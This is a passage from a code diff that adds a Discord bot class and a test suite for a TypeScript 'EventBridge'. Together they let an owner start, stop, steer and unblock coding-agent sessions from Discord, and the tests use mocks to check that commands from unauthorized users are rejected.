+  private eventBridge: EventBridge | null = null;
+
+  private readonly config: NonNullable<DaemonConfig['discord']>;
+  private readonly logger: Logger;
+  private readonly sessionManager: SessionManager;
+  private readonly scanProjects?: () => Promise<ProjectInfo[]>;
+
+  constructor(opts: DiscordBotOptions) {
+    this.config = opts.config;
+    this.logger = opts.logger;
+    this.sessionManager = opts.sessionManager;
+    this.scanProjects = opts.scanProjects;
+  }
+
+  /**
+   * Create the discord.js Client, register event handlers, and log in.
+   * Throws on login failure — the caller (Daemon) decides whether to continue without the bot.
+   */
+  async login(): Promise<void> {
+    const client = new Client({
+      intents: [
+        GatewayIntentBits.Guilds,
+        GatewayIntentBits.GuildMessages,
+        GatewayIntentBits.MessageContent,
+      ],
+    });
+
+    client.once('ready', (readyClient) => {
+      const guildNames = readyClient.guilds.cache.map((g) => g.name).join(', ');
+      this.logger.info('bot ready', {
+        username: readyClient.user.tag,
+        guilds: guildNames,
+      });
+
+      // Register slash commands for the configured guild
+      const rest = new REST({ version: '10' }).setToken(this.config.token);
+      const commands = buildCommands();
+      registerGuildCommands(
+        rest,
+        readyClient.user.id,
+        this.config.guild_id,
+        commands,
+        this.logger,
+      ).catch((err) => {
+        // Should not reach here — registerGuildCommands catches internally
+        this.logger.warn('unexpected command registration error', {
+          error: err instanceof Error ? err.message : String(err),
+        });
+      });
+    });
+
+    client.on('interactionCreate', (interaction: Interaction) => {
+      this.handleInteraction(interaction);
+    });
+
+    // Debug: log all incoming messages at debug level
+    client.on('messageCreate', (msg) => {
+      this.logger.debug('raw messageCreate', {
+        authorId: msg.author.id,
+        authorBot: msg.author.bot,
+        channelId: msg.channelId,
+        contentLength: msg.content.length,
+        hasContent: msg.content.length > 0,
+      });
+    });
+
+    // Reconnection observability — structured logging for all shard lifecycle events (R027)
+    client.on('shardError', (error) => {
+      this.logger.error('discord shard error', { error: error.message });
+    });
+    client.on('shardDisconnect', (event, shardId) => {
+      this.logger.warn('discord shard disconnected', { shardId, code: event.code });
+    });
+    client.on('shardReconnecting', (shardId) => {
+      this.logger.info('discord shard reconnecting', { shardId });
+    });
+    client.on('shardResume', (shardId, replayedEvents) => {
+      this.logger.info('discord shard resumed', { shardId, replayedEvents });
+    });
+    client.on('warn', (message) => {
+      this.logger.warn('discord warning', { message });
+    });
+    client.on('error', (error) => {
+      this.logger.error('discord error', { error: error.message });
+    });
+
+    // Wait for both login AND the 'ready' event.
+    // client.login() resolves on WebSocket auth, but the 'ready' event fires
+    // asynchronously later. We need 'ready' before getChannelManager() works.
+    let readyTimeout: ReturnType<typeof setTimeout> | undefined;
+    let readySettled = false;
+    const readyPromise = new Promise<void>((resolve, reject) => {
+      readyTimeout = setTimeout(() => {
+        if (!readySettled) { readySettled = true; reject(new Error('Discord ready timeout (30s)')); }
+      }, 30_000);
+      const cleanup = () => {
+        if (readyTimeout) { clearTimeout(readyTimeout); readyTimeout = undefined; }
+      };
+      client.once('ready', () => {
+        cleanup();
+        if (!readySettled) { readySettled = true; resolve(); }
+      });
+      client.once('error', (err) => {
+        cleanup();
+        if (!readySettled) { readySettled = true; reject(err); }
+      });
+      // shardDisconnect fires on fatal gateway errors (e.g. 4014 disallowed intents)
+      client.once('shardDisconnect', (event) => {
+        cleanup();
+        if (!readySettled) { readySettled = true; reject(new Error(`Shard disconnected: ${event.code}`)); }
+      });
+    });
+
+    try {
+      await client.login(this.config.token);
+    } catch (err) {
+      // Login itself failed — clean up the ready timer so it doesn't fire as unhandled rejection
+      if (readyTimeout) { clearTimeout(readyTimeout); readyTimeout = undefined; }
+      readySettled = true;
+      throw err;
+    }
+    await readyPromise;
+    this.client = client;
+    this.destroyed = false;
+  }
+
+  /**
+   * Destroy the discord.js Client. Idempotent — safe to call multiple times
+   * or before login().
+   */
+  async destroy(): Promise<void> {
+    if (this.destroyed || !this.client) {
+      this.destroyed = true;
+      return;
+    }
+
+    try {
+      // discord.js destroy() is synchronous but may throw on double-destroy
+      this.client.destroy();
+      this.logger.info('bot destroyed');
+    } catch (err) {
+      // Swallow cleanup errors — shutdown must not fail
+      this.logger.debug('bot destroy error (swallowed)', {
+        error: err instanceof Error ? err.message : String(err),
+      });
+    } finally {
+      this.client = null;
+      this.destroyed = true;
+    }
+  }
+
+  // ---------------------------------------------------------------------------
+  // Public accessors
+  // ---------------------------------------------------------------------------
+
+  /**
+   * Lazily create a ChannelManager from the configured guild.
+   * Returns null if the client isn't ready or the guild isn't found.
+   */
+  getChannelManager(): ChannelManager | null {
+    if (this.channelManager) return this.channelManager;
+    if (!this.client?.isReady()) return null;
+
+    const guild = this.client.guilds.cache.get(this.config.guild_id);
+    if (!guild) {
+      this.logger.warn('guild not found for channel manager', { guildId: this.config.guild_id });
+      return null;
+    }
+
+    this.channelManager = new ChannelManager({ guild, logger: this.logger });
+    return this.channelManager;
+  }
+
+  /**
+   * Return the underlying discord.js Client, or null if not logged in.
+   * Used by Daemon to pass to EventBridge as BridgeClient.
+   */
+  getClient(): Client | null {
+    return this.client;
+  }
+
+  /**
+   * Set the EventBridge reference so the bot can dispatch /gsd-verbose commands.
+   * Called by Daemon after creating the EventBridge.
+   */
+  setEventBridge(bridge: EventBridge): void {
+    this.eventBridge = bridge;
+  }
+
+  // ---------------------------------------------------------------------------
+  // Private: interaction handling
+  // ---------------------------------------------------------------------------
+
+  private handleInteraction(interaction: Interaction): void {
+    if (!isAuthorized(interaction.user.id, this.config.owner_id)) {
+      this.logger.debug('auth rejected', { userId: interaction.user.id });
+      return;
+    }
+
+    // Only handle chat input (slash) commands
+    if (!interaction.isChatInputCommand()) {
+      this.logger.debug('non-command interaction', {
+        type: interaction.type,
+        userId: interaction.user.id,
+      });
+      return;
+    }
+
+    const { commandName } = interaction;
+    this.logger.info('command handled', { commandName, userId: interaction.user.id });
+
+    switch (commandName) {
+      case 'gsd-status': {
+        const sessions = this.sessionManager.getAllSessions();
+        const content = formatSessionStatus(sessions);
+        interaction.reply({ content, ephemeral: true }).catch((err) => {
+          this.logger.warn('gsd-status reply failed', {
+            error: err instanceof Error ? err.message : String(err),
+          });
+        });
+        break;
+      }
+      case 'gsd-start':
+        this.handleGsdStart(interaction).catch((err) => {
+          this.logger.warn('gsd-start handler error', {
+            error: err instanceof Error ? err.message : String(err),
+          });
+        });
+        break;
+      case 'gsd-stop':
+        this.handleGsdStop(interaction).catch((err) => {
+          this.logger.warn('gsd-stop handler error', {
+            error: err instanceof Error ? err.message : String(err),
+          });
+        });
+        break;
+      case 'gsd-verbose': {
+        if (!this.eventBridge) {
+          interaction.reply({ content: 'Event bridge not available.', ephemeral: true }).catch((err) => {
+            this.logger.warn('gsd-verbose reply failed', {
+              error: err instanceof Error ? err.message : String(err),
+            });
+          });
+          break;
+        }
+        const level = (interaction.options.getString('level') ?? 'default') as VerbosityLevel;
+        const channelId = interaction.channelId;
+        this.eventBridge.getVerbosityManager().setLevel(channelId, level);
+        interaction.reply({ content: `Verbosity set to **${level}** for this channel.`, ephemeral: true }).catch((err) => {
+          this.logger.warn('gsd-verbose reply failed', {
+            error: err instanceof Error ? err.message : String(err),
+          });
+        });
+        break;
+      }
+      default:
+        interaction.reply({ content: 'Unknown command', ephemeral: true }).catch((err) => {
+          this.logger.warn('unknown command reply failed', {
+            error: err instanceof Error ? err.message : String(err),
+          });
+        });
+        break;
+    }
+  }
+
+  // ---------------------------------------------------------------------------
+  // Private: /gsd-start handler
+  // ---------------------------------------------------------------------------
+
+  private async handleGsdStart(interaction: import('discord.js').ChatInputCommandInteraction): Promise<void> {
+    await interaction.deferReply({ ephemeral: true });
+    this.logger.info('gsd-start: scanning projects');
+
+    if (!this.scanProjects) {
+      await interaction.editReply({ content: 'Project scanning not available.' });
+      return;
+    }
+
+    let projects: ProjectInfo[];
+    try {
+      projects = await this.scanProjects();
+    } catch (err) {
+      this.logger.error('gsd-start: scan failed', {
+        error: err instanceof Error ? err.message : String(err),
+      });
+      await interaction.editReply({ content: 'Failed to scan for projects.' });
+      return;
+    }
+
+    if (projects.length === 0) {
+      await interaction.editReply({ content: 'No projects found.' });
+      return;
+    }
+
+    // Discord select menus support max 25 options
+    const truncated = projects.slice(0, 25);
+    const select = new StringSelectMenuBuilder()
+      .setCustomId('gsd-start-select')
+      .setPlaceholder('Select a project to start')
+      .addOptions(
+        truncated.map((p) => ({
+          label: p.name.slice(0, 100), // Discord label max 100 chars
+          value: p.path,
+          description: p.markers.join(', ').slice(0, 100) || undefined,
+        })),
+      );
+
+    const row = new ActionRowBuilder<StringSelectMenuBuilder>().addComponents(select);
+    const reply = await interaction.editReply({
+      content: `Select a project to start (${truncated.length}${projects.length > 25 ? ` of ${projects.length}` : ''} projects):`,
+      components: [row],
+    });
+
+    try {
+      const collected = await reply.awaitMessageComponent({
+        componentType: ComponentType.StringSelect,
+        time: 60_000,
+        filter: (i) => i.user.id === interaction.user.id,
+      }) as StringSelectMenuInteraction;
+
+      const projectPath = collected.values[0];
+      this.logger.info('gsd-start: project selected', { projectPath });
+
+      // Defer the update immediately — startSession can take 10-30s to spawn the GSD process,
+      // and Discord's component interaction token expires in 3 seconds without deferral.
+      await collected.deferUpdate();
+
+      try {
+        const sessionId = await this.sessionManager.startSession({ projectDir: projectPath });
+        await interaction.editReply({
+          content: `✅ Session started for **${projectPath}** (ID: \`${sessionId}\`)`,
+          components: [],
+        });
+      } catch (err) {
+        const errMsg = err instanceof Error ? err.message : String(err);
+        this.logger.error('gsd-start: startSession failed', { error: errMsg, projectPath });
+        await interaction.editReply({
+          content: `❌ Failed to start session: ${errMsg}`,
+          components: [],
+        });
+      }
+    } catch {
+      // Timeout or other collector error
+      this.logger.info('gsd-start: selection timed out');
+      await interaction.editReply({ content: 'Selection timed out.', components: [] });
+    }
+  }
+
+  // ---------------------------------------------------------------------------
+  // Private: /gsd-stop handler
+  // ---------------------------------------------------------------------------
+
+  private async handleGsdStop(interaction: import('discord.js').ChatInputCommandInteraction): Promise<void> {
+    await interaction.deferReply({ ephemeral: true });
+    this.logger.info('gsd-stop: listing sessions');
+
+    const allSessions = this.sessionManager.getAllSessions();
+    const activeSessions = allSessions.filter(
+      (s) => s.status === 'running' || s.status === 'blocked' || s.status === 'starting',
+    );
+
+    if (activeSessions.length === 0) {
+      await interaction.editReply({ content: 'No active sessions.' });
+      return;
+    }
+
+    // Discord select menus support max 25 options
+    const truncated = activeSessions.slice(0, 25);
+    const select = new StringSelectMenuBuilder()
+      .setCustomId('gsd-stop-select')
+      .setPlaceholder('Select a session to stop')
+      .addOptions(
+        truncated.map((s) => ({
+          label: `${s.projectName} (${s.status})`.slice(0, 100),
+          value: s.sessionId,
+        })),
+      );
+
+    const row = new ActionRowBuilder<StringSelectMenuBuilder>().addComponents(select);
+    const reply = await interaction.editReply({
+      content: `Select a session to stop (${truncated.length} active):`,
+      components: [row],
+    });
+
+    try {
+      const collected = await reply.awaitMessageComponent({
+        componentType: ComponentType.StringSelect,
+        time: 60_000,
+        filter: (i) => i.user.id === interaction.user.id,
+      }) as StringSelectMenuInteraction;
+
+      const sessionId = collected.values[0];
+      this.logger.info('gsd-stop: session selected', { sessionId });
+
+      try {
+        await this.sessionManager.cancelSession(sessionId);
+        await collected.update({
+          content: `✅ Session \`${sessionId}\` stopped.`,
+          components: [],
+        });
+      } catch (err) {
+        const errMsg = err instanceof Error ? err.message : String(err);
+        this.logger.error('gsd-stop: cancelSession failed', { error: errMsg, sessionId });
+        await collected.update({
+          content: `❌ Failed to stop session: ${errMsg}`,
+          components: [],
+        });
+      }
+    } catch {
+      // Timeout or other collector error
+      this.logger.info('gsd-stop: selection timed out');
+      await interaction.editReply({ content: 'Selection timed out.', components: [] });
+    }
+  }
+}
diff --git a/packages/daemon/src/event-bridge.test.ts b/packages/daemon/src/event-bridge.test.ts
new file mode 100644
index 000000000..8516b9dc4
--- /dev/null
+++ b/packages/daemon/src/event-bridge.test.ts
@@ -0,0 +1,619 @@
+/**
+ * event-bridge.test.ts — Tests for EventBridge orchestrator.
+ *
+ * Uses mock SessionManager (EventEmitter), mock ChannelManager,
+ * mock Discord Client, and mock Logger to test event wiring,
+ * blocker handling, conversation relay, and cleanup.
+ */
+
+import { describe, it, mock } from 'node:test';
+import assert from 'node:assert/strict';
+import { EventEmitter } from 'node:events';
+import { EventBridge } from './event-bridge.js';
+import type { EventBridgeOptions, BridgeClient } from './event-bridge.js';
+import type { PendingBlocker, ManagedSession, DaemonConfig, SessionStatus } from './types.js';
+import type { SdkAgentEvent, RpcClient, RpcExtensionUIRequest } from '@gsd-build/rpc-client';
+
+// ---------------------------------------------------------------------------
+// Mock factories
+// ---------------------------------------------------------------------------
+
+function createMockLogger() {
+  return {
+    debug: mock.fn(() => {}),
+    info: mock.fn(() => {}),
+    warn: mock.fn(() => {}),
+    error: mock.fn(() => {}),
+  };
+}
+
+function createMockChannelManager() {
+  const sentMessages: unknown[] = [];
+  const mockChannel = {
+    id: 'ch-123',
+    send: mock.fn(async (_payload: unknown) => {
+      sentMessages.push(_payload);
+      return { id: 'msg-1' };
+    }),
+    createMessageComponentCollector: mock.fn((_opts?: unknown) => {
+      const collector = new EventEmitter() as EventEmitter & { stop: (reason?: string) => void };
+      collector.stop = (reason?: string) => collector.emit('end', [], reason ?? 'manual');
+      return collector;
+    }),
+  };
+  return {
+    createProjectChannel: mock.fn(async (_dir: string) => mockChannel),
+    _channel: mockChannel,
+    _sentMessages: sentMessages,
+  };
+}
+
+function createMockClient(): BridgeClient & EventEmitter {
+  const emitter = new EventEmitter();
+  const dmSendFn = mock.fn(async () => ({}));
+  const fetchFn = mock.fn(async (_id: string) => ({ send: dmSendFn }));
+  (emitter as unknown as Record<string, unknown>).users = { fetch: fetchFn };
+  return Object.assign(emitter, {
+    users: { fetch: fetchFn },
+    _dmSend: dmSendFn,
+  }) as unknown as BridgeClient & EventEmitter;
+}
+
+function createMockSessionManager() {
+  const sm = new EventEmitter() as EventEmitter & {
+    getSession: ReturnType<typeof mock.fn>;
+    resolveBlocker: ReturnType<typeof mock.fn>;
+  };
+  sm.getSession = mock.fn((_id: string) => undefined as ManagedSession | undefined);
+  sm.resolveBlocker = mock.fn(async (_sid: string, _resp: string) => {});
+  return sm;
+}
+
+function createMockSession(overrides?: Partial<ManagedSession>): ManagedSession {
+  return {
+    sessionId: 'sess-1',
+    projectDir: '/test/project',
+    projectName: 'project',
+    status: 'running' as SessionStatus,
+    client: {
+      steer: mock.fn(async (_msg: string) => {}),
+      prompt: mock.fn(async () => ({})),
+    } as unknown as RpcClient,
+    events: [],
+    pendingBlocker: null,
+    cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } },
+    startTime: Date.now(),
+    ...overrides,
+  };
+}
+
+const DEFAULT_CONFIG: DaemonConfig = {
+  discord: {
+    token: 'test-token',
+    guild_id: 'guild-1',
+    owner_id: 'owner-1',
+    dm_on_blocker: false,
+  },
+  projects: { scan_roots: [] },
+  log: { file: '/tmp/test.log', level: 'debug', max_size_mb: 10 },
+};
+
+function buildBridge(overrides?: Partial<EventBridgeOptions>) {
+  const sessionManager = createMockSessionManager();
+  const channelManager = createMockChannelManager();
+  const client = createMockClient();
+  const logger = createMockLogger();
+
+  const opts: EventBridgeOptions = {
+    sessionManager: sessionManager as unknown as EventBridgeOptions['sessionManager'],
+    channelManager: channelManager as unknown as EventBridgeOptions['channelManager'],
+    client,
+    config: DEFAULT_CONFIG,
+    logger: logger as unknown as EventBridgeOptions['logger'],
+    ownerId: 'owner-1',
+    ...overrides,
+  };
+
+  const bridge = new EventBridge(opts);
+  return { bridge, sessionManager, channelManager, client, logger };
+}
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+const tick = () => new Promise<void>((r) => setTimeout(r, 30));
+
+function mockFn(obj: unknown): { mock: { callCount(): number; calls: Array<{ arguments: unknown[]; result?: unknown }> } } {
+  return obj as { mock: { callCount(): number; calls: Array<{ arguments: unknown[]; result?: unknown }> } };
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+describe('EventBridge', () => {
+  describe('lifecycle', () => {
+    it('start() subscribes to session manager events and messageCreate', () => {
+      const { bridge, sessionManager, client } = buildBridge();
+      bridge.start();
+      assert.ok(sessionManager.listenerCount('session:started') > 0);
+      assert.ok(sessionManager.listenerCount('session:event') > 0);
+      assert.ok(sessionManager.listenerCount('session:blocked') > 0);
+      assert.ok(sessionManager.listenerCount('session:completed') > 0);
+      assert.ok(sessionManager.listenerCount('session:error') > 0);
+      assert.ok(client.listenerCount('messageCreate') > 0);
+    });
+
+    it('stop() unsubscribes from all events and clears mappings', async () => {
+      const { bridge, sessionManager, client } = buildBridge();
+      bridge.start();
+      await bridge.stop();
+      assert.equal(sessionManager.listenerCount('session:started'), 0);
+      assert.equal(sessionManager.listenerCount('session:event'), 0);
+      assert.equal(sessionManager.listenerCount('session:blocked'), 0);
+      assert.equal(sessionManager.listenerCount('session:completed'), 0);
+      assert.equal(sessionManager.listenerCount('session:error'), 0);
+      assert.equal(client.listenerCount('messageCreate'), 0);
+    });
+
+    it('start() is idempotent', () => {
+      const { bridge, sessionManager } = buildBridge();
+      bridge.start();
+      bridge.start();
+      assert.equal(sessionManager.listenerCount('session:started'), 1);
+    });
+
+    it('getVerbosityManager() returns a VerbosityManager', () => {
+      const { bridge } = buildBridge();
+      const vm = bridge.getVerbosityManager();
+      assert.ok(vm);
+      assert.equal(typeof vm.shouldShow, 'function');
+    });
+  });
+
+  describe('session:started → channel creation + welcome embed', () => {
+    it('creates channel and batcher', async () => {
+      const { bridge, sessionManager, channelManager } = buildBridge();
+      bridge.start();
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+      assert.equal(mockFn(channelManager.createProjectChannel).mock.callCount(), 1);
+    });
+
+    it('logs error and skips when channel creation fails', async () => {
+      const failingCm = {
+        createProjectChannel: mock.fn(async () => { throw new Error('API error'); }),
+      };
+      const { bridge, sessionManager, logger } = buildBridge({
+        channelManager: failingCm as unknown as EventBridgeOptions['channelManager'],
+      });
+      bridge.start();
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+      assert.ok(mockFn(logger.error).mock.callCount() > 0);
+    });
+  });
+
+  describe('session:event → format + verbosity filter + enqueue', () => {
+    it('formats event and enqueues to batcher (no errors)', async () => {
+      const { bridge, sessionManager, logger } = buildBridge();
+      bridge.start();
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      sessionManager.emit('session:event', {
+        sessionId: 'sess-1', projectDir: '/test/project',
+        event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent,
+      });
+      await tick();
+      // No errors
+      assert.equal(mockFn(logger.error).mock.callCount(), 0);
+    });
+
+    it('filters events based on verbosity', async () => {
+      const { bridge, sessionManager, channelManager, logger } = buildBridge();
+      bridge.start();
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      // Set quiet mode
+      bridge.getVerbosityManager().setLevel('ch-123', 'quiet');
+
+      // cost_update filtered in quiet
+      sessionManager.emit('session:event', {
+        sessionId: 'sess-1', projectDir: '/test/project',
+        event: { type: 'cost_update', cumulativeCost: 1.5 } as SdkAgentEvent,
+      });
+      await tick();
+      // tool_execution_start filtered in quiet
+      sessionManager.emit('session:event', {
+        sessionId: 'sess-1', projectDir: '/test/project',
+        event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent,
+      });
+      await tick();
+      assert.equal(mockFn(logger.error).mock.callCount(), 0);
+    });
+  });
+
+  describe('session:blocked → blocker embed + buttons + optional DM', () => {
+    it('sends blocker embed and creates collector for confirm', async () => {
+      const { bridge, sessionManager, channelManager } = buildBridge();
+      bridge.start();
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const blocker: PendingBlocker = {
+        id: 'blocker-1', method: 'confirm', message: 'Continue?',
+        event: { id: 'blocker-1', method: 'confirm', message: 'Continue?' } as RpcExtensionUIRequest,
+      };
+      sessionManager.emit('session:blocked', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker,
+      });
+      await tick();
+      assert.ok(mockFn(channelManager._channel.createMessageComponentCollector).mock.callCount() > 0);
+    });
+
+    it('sends DM when dm_on_blocker is configured', async () => {
+      const config: DaemonConfig = {
+        ...DEFAULT_CONFIG,
+        discord: { ...DEFAULT_CONFIG.discord!, dm_on_blocker: true },
+      };
+      const client = createMockClient();
+      const { bridge, sessionManager } = buildBridge({ config, client });
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const blocker: PendingBlocker = {
+        id: 'blocker-1', method: 'input', message: 'Enter API key',
+        event: { id: 'blocker-1', method: 'input' } as RpcExtensionUIRequest,
+      };
+      sessionManager.emit('session:blocked', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker,
+      });
+      await tick();
+
+      const usersFetch = (client as unknown as Record<string, { fetch: unknown }>).users.fetch;
+      assert.equal(mockFn(usersFetch).mock.callCount(), 1);
+    });
+
+    it('does not send DM when dm_on_blocker is false', async () => {
+      const client = createMockClient();
+      const { bridge, sessionManager } = buildBridge({ client });
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const blocker: PendingBlocker = {
+        id: 'blocker-1', method: 'input', message: 'Enter value',
+        event: { id: 'blocker-1', method: 'input' } as RpcExtensionUIRequest,
+      };
+      sessionManager.emit('session:blocked', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker,
+      });
+      await tick();
+
+      const usersFetch = (client as unknown as Record<string, { fetch: unknown }>).users.fetch;
+      assert.equal(mockFn(usersFetch).mock.callCount(), 0);
+    });
+  });
+
+  describe('button collector → resolveBlocker', () => {
+    it('resolves blocker on button click from authorized user', async () => {
+      const { bridge, sessionManager, channelManager } = buildBridge();
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const blocker: PendingBlocker = {
+        id: 'blocker-1', method: 'confirm', message: 'Confirm?',
+        event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest,
+      };
+      sessionManager.emit('session:blocked', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker,
+      });
+      await tick();
+
+      const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls;
+      assert.ok(collectorCalls.length > 0);
+      const collector = collectorCalls[0]!.result as EventEmitter;
+
+      const mockInteraction = {
+        customId: 'blocker:blocker-1:confirm:true',
+        user: { id: 'owner-1' },
+        update: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      };
+      collector.emit('collect', mockInteraction);
+      await tick();
+
+      assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 1);
+      const args = mockFn(sessionManager.resolveBlocker).mock.calls[0]!.arguments;
+      assert.equal(args[0], 'sess-1');
+      assert.equal(args[1], 'true');
+    });
+
+    it('rejects button click from unauthorized user', async () => {
+      const { bridge, sessionManager, channelManager } = buildBridge();
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const blocker: PendingBlocker = {
+        id: 'blocker-1', method: 'confirm', message: 'Confirm?',
+        event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest,
+      };
+      sessionManager.emit('session:blocked', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker,
+      });
+      await tick();
+
+      const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls;
+      const collector = collectorCalls[0]!.result as EventEmitter;
+
+      const mockInteraction = {
+        customId: 'blocker:blocker-1:confirm:true',
+        user: { id: 'stranger-99' },
+        update: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      };
+      collector.emit('collect', mockInteraction);
+      await tick();
+
+      assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 0);
+      assert.equal(mockFn(mockInteraction.reply).mock.callCount(), 1);
+    });
+
+    it('posts error when resolveBlocker throws', async () => {
+      const { bridge, sessionManager, channelManager } = buildBridge();
+      sessionManager.resolveBlocker = mock.fn(async () => { throw new Error('No pending blocker'); });
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const blocker: PendingBlocker = {
+        id: 'blocker-1', method: 'confirm', message: 'Confirm?',
+        event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest,
+      };
+      sessionManager.emit('session:blocked', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker,
+      });
+      await tick();
+
+      const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls;
+      const collector = collectorCalls[0]!.result as EventEmitter;
+
+      const mockInteraction = {
+        customId: 'blocker:blocker-1:confirm:true',
+        user: { id: 'owner-1' },
+        update: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      };
+      collector.emit('collect', mockInteraction);
+      await tick();
+
+      assert.equal(mockFn(mockInteraction.reply).mock.callCount(), 1);
+      const replyArg = mockFn(mockInteraction.reply).mock.calls[0]!.arguments[0] as Record<string, unknown>;
+      assert.ok(String(replyArg.content).includes('Failed to resolve'));
+    });
+  });
+
+  describe('messageCreate relay', () => {
+    it('relays message to session steer when no pending blocker', async () => {
+      const session = createMockSession();
+      const { bridge, sessionManager, client } = buildBridge();
+      sessionManager.getSession = mock.fn(() => session);
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const msg = {
+        author: { id: 'owner-1', bot: false },
+        channelId: 'ch-123',
+        content: 'check the test results',
+        react: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      };
+      client.emit('messageCreate', msg);
+      await tick();
+
+      assert.equal(mockFn(session.client.steer).mock.callCount(), 1);
+      assert.equal(mockFn(session.client.steer).mock.calls[0]!.arguments[0], 'check the test results');
+    });
+
+    it('resolves blocker via relay for input method', async () => {
+      const blocker: PendingBlocker = {
+        id: 'blocker-2', method: 'input', message: 'Enter value',
+        event: { id: 'blocker-2', method: 'input' } as RpcExtensionUIRequest,
+      };
+      const session = createMockSession({ pendingBlocker: blocker, status: 'blocked' });
+      const { bridge, sessionManager, client } = buildBridge();
+      sessionManager.getSession = mock.fn(() => session);
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const msg = {
+        author: { id: 'owner-1', bot: false },
+        channelId: 'ch-123',
+        content: 'my-api-key-value',
+        react: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      };
+      client.emit('messageCreate', msg);
+      await tick();
+
+      assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 1);
+      assert.equal(mockFn(sessionManager.resolveBlocker).mock.calls[0]!.arguments[1], 'my-api-key-value');
+    });
+
+    it('ignores bot messages', async () => {
+      const session = createMockSession();
+      const { bridge, sessionManager, client } = buildBridge();
+      sessionManager.getSession = mock.fn(() => session);
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      client.emit('messageCreate', {
+        author: { id: 'bot-1', bot: true },
+        channelId: 'ch-123',
+        content: 'automated',
+        react: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      });
+      await tick();
+
+      assert.equal(mockFn(session.client.steer).mock.callCount(), 0);
+    });
+
+    it('ignores messages in non-project channels', async () => {
+      const session = createMockSession();
+      const { bridge, sessionManager, client } = buildBridge();
+      sessionManager.getSession = mock.fn(() => session);
+      bridge.start();
+
+      client.emit('messageCreate', {
+        author: { id: 'owner-1', bot: false },
+        channelId: 'random-ch-999',
+        content: 'hello',
+        react: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      });
+      await tick();
+
+      assert.equal(mockFn(session.client.steer).mock.callCount(), 0);
+    });
+
+    it('ignores messages from unauthorized users', async () => {
+      const session = createMockSession();
+      const { bridge, sessionManager, client } = buildBridge();
+      sessionManager.getSession = mock.fn(() => session);
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      client.emit('messageCreate', {
+        author: { id: 'stranger-99', bot: false },
+        channelId: 'ch-123',
+        content: 'hack the planet',
+        react: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      });
+      await tick();
+
+      assert.equal(mockFn(session.client.steer).mock.callCount(), 0);
+    });
+
+    it('posts error when steer fails', async () => {
+      const session = createMockSession();
+      (session.client as unknown as Record<string, unknown>).steer = mock.fn(async () => {
+        throw new Error('session dead');
+      });
+      const { bridge, sessionManager, client } = buildBridge();
+      sessionManager.getSession = mock.fn(() => session);
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      const msg = {
+        author: { id: 'owner-1', bot: false },
+        channelId: 'ch-123',
+        content: 'try this',
